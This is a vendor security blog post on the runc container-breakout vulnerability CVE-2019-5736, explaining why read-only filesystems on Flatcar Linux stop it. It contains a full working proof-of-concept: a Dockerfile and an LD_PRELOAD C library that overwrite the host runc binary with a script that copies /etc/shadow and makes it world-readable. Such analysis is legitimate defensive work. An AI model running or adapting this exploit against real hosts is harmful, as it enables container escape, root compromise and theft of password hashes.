runc “breakout” Vulnerability Mitigated on Flatcar Linux
Last week, a high severity vulnerability was disclosed by the maintainers of
runc, under the name CVE-2019-5736: runc container
breakout. This
vulnerability has high severity (CVSS score 7.2) because it allows a malicious
container to overwrite the host runc
binary and gain root privileges on the
host. According to our research, however, when using Flatcar Linux with its
read-only filesystems this vulnerability is not exploitable.
runc vulnerability background
In the context of our security work, we had been asked to evaluate the report’s severity with respect to the client’s installation. In the course of this evaluation, we wrote an exploit in order to understand how it works and to test if their installation was vulnerable. While we did recognize the severity of the issue, we also ascertained that the client was not affected. To understand this, let’s take a look at how things should work versus what could happen if the exploit was successfully executed.
How containers should work
Let’s first look at the following diagram showing how runc should work.
runc forks a new process that becomes the pid1 of the container. Following the
traditional fork/exec Unix model, that process is so far only a copy of the
parent process and therefore still runs the “runc” program. /proc/self/exe
points to runc while running in the container.
Then, pid1 will execute the entrypoint in the container, meaning the program running will be substituted to the program in the container.
How our runc exploit works
The runc exploit code changes the normal behaviour in the following ways
-
Instead of executing our own program in the container, we set the entrypoint to
/proc/self/exe
, meaning runc will runrunc
again. So/proc/1/exe
will be a reference to runc for a longer time. -
However, we don’t want to run the
runc
code. WithLD_PRELOAD
, we will execute a routine that will sleep for a few seconds in order to keep the reference/proc/1/exe
for the next step. -
During those few seconds, we have enough time to enter the container with
runc exec
and open a reference to/proc/1/exe
, while it is still pointing torunc
(file descriptor 10 in our exploit). -
At this point, we cannot open
runc
in read-write mode because pid1 is still running runc. We would get the error “text busy” if we tried. -
The sleep in pid1 terminates and executes something else (another sleep but via
/bin/sh
so pid1 does not lockrunc
). -
Finally, we have a temporary read-only file descriptor to the runc binary on the host filesystem and we use
tee /proc/self/fd/10
to acquire a new file descriptor in write mode and to overwrite the runc binary.
Our exploit container image is simply a LD_PRELOAD
program:
FROM fedora:latest
RUN ln -s /proc/self/exe /exe
RUN dnf install -y gcc
RUN mkdir -p /src
COPY foo.c /
RUN gcc -Wall -o /foo.so -shared -fPIC /foo.c -ldl
ENV LD_PRELOAD=/foo.so
CMD [ "/usr/bin/sh" ]
Here is the source code:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
static void __myinit(void) __attribute__((constructor));
static void __myinit(void)
{
int pid;
unsetenv("LD_PRELOAD");
pid = getpid();
if (pid == 1) {
printf("I am pid 1. Sleeping 3 seconds...\n");
sleep(3);
printf("I am pid 1. Sleeping forever...\n");
execl("/bin/sh", "sh", "-c",
"/bin/sleep 1000",
(char *) 0);
exit(0);
}
printf("I am pid %d. Starting Hijack...\n", pid);
execl("/bin/sh", "sh", "-c",
"exec 10< /proc/1/exe ; "
"echo Lookup inode of /proc/1/exe: ; "
"stat -L --format=%i /proc/1/exe ; "
"echo sleep 4 ; "
"sleep 4 ; "
"printf '#!/bin/sh\\ncp /etc/shadow /home/ubuntu/\\nchmod 444 /home/ubuntu/shadow\\n' | tee /proc/self/fd/10 > /dev/null ; "
"echo done ; ",
(char *) 0);
exit(0);
}
This program is a single function compiled into foo.so
, loaded via the
environment variable $LD_PRELOAD
. It will be executed both as the initial
process in the container (pid 1) and whenever entering in the container with
docker exec
. If it’s running as pid 1 (if (pid == 1)
), it will run the red
part of the diagram above. If it’s running via docker enter
, it will run the
bottom part of the diagram above.
Running the exploit on Ubuntu
When trying this on Ubuntu, we can overwrite runc
on the host.
When executing the exploit, /usr/bin/docker-runc
is overwritten by the
malicious script that copies the password file /etc/shadow
from the host,
making it available for others to read.
Trying the exploit on Flatcar Linux
Then, we tried the same exploit on Flatcar Linux and we couldn’t reach the same result.
Flatcar Linux mounts /usr
in read-only mode, protecting most programs from
being overwritten. However, this test does not use runc
from /usr/bin/runc
but from /run/torcx/unpack/docker/bin/runc
(managed by
torcx). But torcx also uses a read-only
mount for the programs, so it is protected the same way.
Conclusion
As we have demonstrated, the read-only filesystems feature of Flatcar Linux is capable of mitigating this runc vulnerability. It can also help against similar exploits of this class. In addition, Flatcar Linux delivers updates automatically, including security fixes. These are some of the reasons we are pushing Flatcar Linux forward and using it as the base for our upcoming open source products.
Since developing our own exploit, the researchers who found this vulnerability and the maintainers of runc also published their exploit, working in a similar way:
- https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
- https://groups.google.com/a/opencontainers.org/forum/#!topic/dev/RFURhHE8FD4
If you want to learn more about Flatcar Linux, head over to flatcar-linux.org.
If you need help with security assessments, penetration testing, or engineering services contact us at [email protected].